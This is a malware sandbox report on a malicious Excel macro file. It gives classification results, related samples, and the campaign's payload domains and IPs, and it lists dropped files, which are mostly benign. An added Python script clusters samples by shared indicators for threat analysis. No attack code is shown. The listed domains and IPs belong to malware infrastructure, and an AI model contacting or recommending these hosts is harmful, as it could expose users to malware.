Sample file name: statistic-2067311372.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.troj.expl.evad.winXLSM@5/18@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Excluded IPs from analysis (whitelisted): 192.35.177.64, 205.185.216.10, 205.185.216.42, 93.184.221.240
• Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net
• Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

192.185.5.2, seen in earlier analyses of (all detected as malicious): statistic-2070252624.xlsm (2 analyses), statistic-2069354685.xlsm, statistic-2072807337.xlsm (2 analyses), statistic-207394368.xlsm (2 analyses), catalog-1521295750.xlsm (2 analyses), statistic-1048881972.xlsm (2 analyses), f.xlsm (2 analyses), statistic-118970052.xlsm (2 analyses), 14e9289c_by_Libranalysis.xlsx (2 analyses), diagram-1732659868.xlsm (3 analyses)
192.254.233.89, seen in earlier analyses of (all detected as malicious): statistic-2070252624.xlsm (2 analyses), statistic-2069354685.xlsm, statistic-2072807337.xlsm (2 analyses), statistic-207394368.xlsm (2 analyses), statistic-1048881972.xlsm (2 analyses), statistic-118970052.xlsm (2 analyses), 14e9289c_by_Libranalysis.xlsx (2 analyses)

                                                                                    Domains

Match                      Associated Sample Name / URL       Detection   Context
industrialarttextile.com   statistic-2070252624.xlsm          malicious   192.254.233.89
                           statistic-2069354685.xlsm          malicious   192.254.233.89
                           statistic-2070252624.xlsm          malicious   192.254.233.89
                           statistic-2072807337.xlsm          malicious   192.254.233.89
                           statistic-207394368.xlsm           malicious   192.254.233.89
                           statistic-2072807337.xlsm          malicious   192.254.233.89
                           statistic-207394368.xlsm           malicious   192.254.233.89
                           statistic-1048881972.xlsm          malicious   192.254.233.89
                           statistic-1048881972.xlsm          malicious   192.254.233.89
                           statistic-118970052.xlsm           malicious   192.254.233.89
                           statistic-118970052.xlsm           malicious   192.254.233.89
                           14e9289c_by_Libranalysis.xlsx      malicious   192.254.233.89
                           14e9289c_by_Libranalysis.xlsx      malicious   192.254.233.89
anaheimdermatologists.com  statistic-2070252624.xlsm          malicious   192.185.5.2
                           statistic-2069354685.xlsm          malicious   192.185.5.2
                           statistic-2070252624.xlsm          malicious   192.185.5.2
                           statistic-2072807337.xlsm          malicious   192.185.5.2
                           statistic-207394368.xlsm           malicious   192.185.5.2
                           statistic-2072807337.xlsm          malicious   192.185.5.2
                           statistic-207394368.xlsm           malicious   192.185.5.2
                           statistic-1048881972.xlsm          malicious   192.185.5.2
                           statistic-1048881972.xlsm          malicious   192.185.5.2
                           statistic-118970052.xlsm           malicious   192.185.5.2
                           statistic-118970052.xlsm           malicious   192.185.5.2
                           14e9289c_by_Libranalysis.xlsx      malicious   192.185.5.2
                           14e9289c_by_Libranalysis.xlsx      malicious   192.185.5.2

                                                                                    ASN

Match                      Associated Sample Name / URL       Detection   Context
UNIFIEDLAYER-AS-1 (US)     statistic-2070252624.xlsm          malicious   192.254.233.89
                           statistic-2069354685.xlsm          malicious   192.254.233.89
                           statistic-2070252624.xlsm          malicious   192.254.233.89
                           statistic-2072807337.xlsm          malicious   192.254.233.89
                           INDIA ORDERD CH2323ED.exe          malicious   162.241.169.22
                           ARIX SRLVl (MN) - Italy.exe        malicious   192.254.185.244
                           statistic-207394368.xlsm           malicious   192.254.233.89
                           statistic-2072807337.xlsm          malicious   192.254.233.89
                           statistic-207394368.xlsm           malicious   192.254.233.89
                           presentation.jar                   malicious   50.87.249.219
                           presentation.jar                   malicious   50.87.249.219
                           GK58.vbs                           malicious   192.185.21.136
                           catalog-1521295750.xlsm            malicious   192.185.20.98
                           catalog-1521295750.xlsm            malicious   192.185.20.98
                           4GGwmv0AJm.exe                     malicious   50.87.166.59
                           c647b2da_by_Libranalysis.exe       malicious   108.179.242.122
                           c647b2da_by_Libranalysis.exe       malicious   108.179.242.122
                           6613n246zm543w.xlsb                malicious   162.241.24.47
                           DEMARG MALAYHCU21345.exe           malicious   162.241.169.22
                           generated check 662732.xlsm        malicious   192.185.177.61

                                                                                    JA3 Fingerprints

Match                             Associated Sample Name / URL          Detection   Context
7dcce5b76c8b17472d024758970a406b  statistic-2069354685.xlsm             malicious   192.185.5.2, 192.254.233.89
                                  statistic-2070252624.xlsm             malicious   192.185.5.2, 192.254.233.89
                                  statistic-2072807337.xlsm             malicious   192.185.5.2, 192.254.233.89
                                  statistic-207394368.xlsm              malicious   192.185.5.2, 192.254.233.89
                                  e1df57de_by_Libranalysis.xls          malicious   192.185.5.2, 192.254.233.89
                                  MV RED SEA.docx                       malicious   192.185.5.2, 192.254.233.89
                                  SecuriteInfo.com.Heur.31681.xls       malicious   192.185.5.2, 192.254.233.89
                                  catalog-1521295750.xlsm               malicious   192.185.5.2, 192.254.233.89
                                  Documents_111651917_375818984.xls     malicious   192.185.5.2, 192.254.233.89
                                  Documents_95326461_1831689059.xls     malicious   192.185.5.2, 192.254.233.89
                                  471e3984_by_Libranalysis.docx         malicious   192.185.5.2, 192.254.233.89
                                  presupuesto.xlsx                      malicious   192.185.5.2, 192.254.233.89
                                  ORDER INQUIRY.doc                     malicious   192.185.5.2, 192.254.233.89
                                  Outstanding Payment Plan.xls          malicious   192.185.5.2, 192.254.233.89
                                  SecuriteInfo.com.Heur.3869.xls        malicious   192.185.5.2, 192.254.233.89
                                  SecuriteInfo.com.Heur.12433.xls       malicious   192.185.5.2, 192.254.233.89
                                  Documents_1906038956_974385067.xls    malicious   192.185.5.2, 192.254.233.89
                                  SecuriteInfo.com.Heur.3421.xls        malicious   192.185.5.2, 192.254.233.89
                                  diagram-586750002.xlsm                malicious   192.185.5.2, 192.254.233.89
                                  94a5cd81_by_Libranalysis.xls          malicious   192.185.5.2, 192.254.233.89
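The Domains, ASN and JA3 tables above are pivot material, but the three indicator types carry very different weight: the JA3 hash 7dcce5b76c8b17472d024758970a406b is the TLS client stack of the sandbox's Office/Windows build and is shared by every Office sample run on it (note the unrelated .docx, .doc and .xls samples it matches), and the UNIFIEDLAYER-AS-1 ASN is shared by every customer of that hosting provider, whereas the two payload domains are specific to this campaign. The following script, added here as an example and not part of the Joe Sandbox report, scores related samples from a transcribed subset of the tables so that ASN-only or JA3-only overlap does not count as a relationship; the per-type weights and the `min_score` threshold are assumptions to tune for your own data.

```python
from collections import defaultdict

# Constructed rows transcribed from the report's Domains / ASN / JA3 context
# tables: (indicator_type, indicator_value, sample_name, ip).
# A representative subset only; extend from the tables as needed.
ROWS = [
    ("domain", "industrialarttextile.com", "statistic-2070252624.xlsm", "192.254.233.89"),
    ("domain", "industrialarttextile.com", "statistic-2069354685.xlsm", "192.254.233.89"),
    ("domain", "industrialarttextile.com", "statistic-2072807337.xlsm", "192.254.233.89"),
    ("domain", "anaheimdermatologists.com", "statistic-2070252624.xlsm", "192.185.5.2"),
    ("domain", "anaheimdermatologists.com", "statistic-2069354685.xlsm", "192.185.5.2"),
    ("domain", "anaheimdermatologists.com", "statistic-2072807337.xlsm", "192.185.5.2"),
    ("asn", "UNIFIEDLAYER-AS-1", "statistic-2070252624.xlsm", "192.254.233.89"),
    ("asn", "UNIFIEDLAYER-AS-1", "statistic-2069354685.xlsm", "192.254.233.89"),
    ("asn", "UNIFIEDLAYER-AS-1", "statistic-2072807337.xlsm", "192.254.233.89"),
    ("asn", "UNIFIEDLAYER-AS-1", "INDIA ORDERD CH2323ED.exe", "162.241.169.22"),
    ("asn", "UNIFIEDLAYER-AS-1", "presentation.jar", "50.87.249.219"),
    ("ja3", "7dcce5b76c8b17472d024758970a406b", "statistic-2069354685.xlsm", "192.185.5.2"),
    ("ja3", "7dcce5b76c8b17472d024758970a406b", "statistic-2070252624.xlsm", "192.185.5.2"),
    ("ja3", "7dcce5b76c8b17472d024758970a406b", "statistic-2072807337.xlsm", "192.185.5.2"),
    ("ja3", "7dcce5b76c8b17472d024758970a406b", "MV RED SEA.docx", "192.185.5.2"),
]

# Weight per indicator type (assumption). An ASN is shared by every tenant of a
# hosting provider and the JA3 hash is the sandbox's TLS stack, so neither alone
# ties two samples together; a shared payload domain does.
WEIGHTS = {"domain": 3, "ja3": 1, "asn": 1}


def pivot_by_sample(rows):
    """Map each sample to the set of 'type:value' indicators it was seen with."""
    out = defaultdict(set)
    for itype, value, sample, _ip in rows:
        out[sample].add(f"{itype}:{value}")
    return dict(out)


def pivot_by_ip(rows):
    """Map each IP to the samples that contacted it, regardless of indicator type."""
    out = defaultdict(set)
    for _itype, _value, sample, ip in rows:
        out[ip].add(sample)
    return dict(out)


def related_samples(rows, sample, min_score=4):
    """Samples whose indicators shared with `sample` score at least min_score.

    Returns a list of (other_sample, score, sorted_common_indicators), highest
    score first. With the default threshold a single ASN or JA3 overlap is not
    enough; at least one shared domain (weight 3) plus something else is needed.
    """
    by_sample = pivot_by_sample(rows)
    mine = by_sample.get(sample, set())
    result = []
    for other, theirs in by_sample.items():
        if other == sample:
            continue
        common = mine & theirs
        score = sum(WEIGHTS[i.split(":", 1)[0]] for i in common)
        if score >= min_score:
            result.append((other, score, sorted(common)))
    result.sort(key=lambda r: (-r[1], r[0]))
    return result


if __name__ == "__main__":
    for other, score, common in related_samples(ROWS, "statistic-2069354685.xlsm"):
        print(f"{score:2d}  {other}  {common}")
    print("weak-only matches:", [
        o for o, s, _ in related_samples(ROWS, "statistic-2069354685.xlsm", min_score=1)
        if s < 4
    ])
```

Lowering `min_score` to 1 brings back MV RED SEA.docx (JA3 only) and the two unrelated executables (ASN only), which is exactly the noise the weighting is meant to keep out of a campaign cluster.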

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Microsoft Cabinet archive data, 58596 bytes, 1 file
Category: dropped
Size (bytes): 58596
Entropy (8bit): 7.995478615012125
Encrypted: true
SSDEEP: 1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5: 61A03D15CF62612F50B74867090DBE79
SHA1: 15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256: F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512: 5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious: false
Reputation: high, very likely benign file
Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 893
Entropy (8bit): 7.366016576663508
Encrypted: false
SSDEEP: 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5: D4AE187B4574036C2D76B6DF8A8C1A30
SHA1: B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256: A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512: 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious: false
Reputation: high, very likely benign file
Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 326
Entropy (8bit): 3.108530598490857
Encrypted: false
SSDEEP: 6:kKHkcwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:/HwTJrkPlE99SNxAhUe0ht
MD5: A9AEF2A691D32823CA004DB5A4E6D1B1
SHA1: 048220F150A19CEE835E02C9B102E2549EC7C51A
SHA-256: 123D61E0B4248FB8474DDCAAF38792BD5D65A7BDA2E9876AC644DA04A86EED21
SHA-512: 0468356E69ABFE5F0A5D3283BB8D6D326E06B36F917A0A9047CF4B39547776C9A16A2CDC3DFAA25997918351A667E270701B7D010ED3DC539076CD20131ADBB8
Malicious: false
Reputation: low
Preview: p...... ............'A..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 252
Entropy (8bit): 2.972520505905614
Encrypted: false
SSDEEP: 3:kkFklQCI/XfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPM:kK/90QE1liBAIdQZV7ulPPN
MD5: E7F506FD38BF085AA67201A4C34F1452
SHA1: E0344908024E332071F87134967530F4E3FF3C79
SHA-256: C2D2DD211EF139C412AEEB2FD777BDD0339638ACAA80ACEF25F686CBDF59E1C1
SHA-512: 6E8D80AEC5925E23745D98EA79EF1F10A010ADA89F76462EFDDFDF7865A3105C4C5C8864516A1AAADEDCC219CA068360A879BDE82F118A31C6C2F7CB5BD04AD9
Malicious: false
Reputation: low
Preview: p...... ....`...7.i.'A..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\suspendedpage[1].htm
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text
Category: downloaded
Size (bytes): 494
Entropy (8bit): 4.962239405540505
Encrypted: false
SSDEEP: 12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
MD5: 0357AA49EA850B11B99D09A2479C321B
SHA1: 41472BA5C40F61FA1C77C42CF06248F13B8785F0
SHA-256: 0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
SHA-512: A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
Malicious: false
Reputation: moderate, very likely benign file
IE Cache URL: https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                                                    Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48501294.png
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):8301
                                                                                    Entropy (8bit):7.970711494690041
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                    MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                    SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                    SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                    SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63EBE985.png
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):34787
                                                                                    Entropy (8bit):7.9883689087667955
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                                                    MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                                                    SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                                                    SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                                                    SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                                                    Malicious:false
                                                                                    Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6DA5ADB.png
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):848
                                                                                    Entropy (8bit):7.595467031611744
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                    MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                    SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                    SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                    SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                    Malicious:false
                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E002D9C2.png
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):557
                                                                                    Entropy (8bit):7.343009301479381
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                    MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                    SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                    SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                    SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                    Malicious:false
                                                                                    Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                    C:\Users\user\AppData\Local\Temp\CFDE0000
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):109077
                                                                                    Entropy (8bit):7.916954833344646
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:oeuov3BiTr4GDgM+1M92hjPcQpWUot9ENPcNcrAOJOerwzkFBHhr6vQnf+zyyfZD:oeuocrZD2MopH8x+FHdoLqp6vif+zbl
                                                                                    MD5:520DFA3FCAA0EB5150D431FD0A7BD0C9
                                                                                    SHA1:D74FBF464CBA7779A4289F6E0BC4717BEE201189
                                                                                    SHA-256:7A25221090E8C732FFF6D20897E838B0F11160DD223C8B7CD8B0DBC80AD25054
                                                                                    SHA-512:A92F840135F9AA8218E502E9ED48B8A18706AF0DCCA0AA52F23DE374AC69533D4BF474F67423B9E61049420B320DCE8763AE2E5C98F8DC96D270CF6BE347724A
                                                                                    Malicious:false
                                                                                    Preview: .U.n.0....?..........C....I?.&..a..e.....5..Jr........jcM....w-.hf..'..k.....0.....Z..dW......XQ...).....l|.G3+..H..;..\....l..K...T.......&U....)Yj....2U.D.FK.H(.r.......|...`. ....&DM...R....u...f.y.xE...%#2....,.`..~!.^a.3..0.....ZAu'b.......}\/._7.A...k.H0Mq..BF........^..`*........7........E. .V.-f.....2.n:.h.]].a..J.../...c..........-...c.E.u.(...../.....s......>.....> .q...$Y....AL..Yv,)..........a.@....pZ........PK..........!.t...............[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\CabEA41.tmp
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                    Category:dropped
                                                                                    Size (bytes):58596
                                                                                    Entropy (8bit):7.995478615012125
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                    Malicious:false
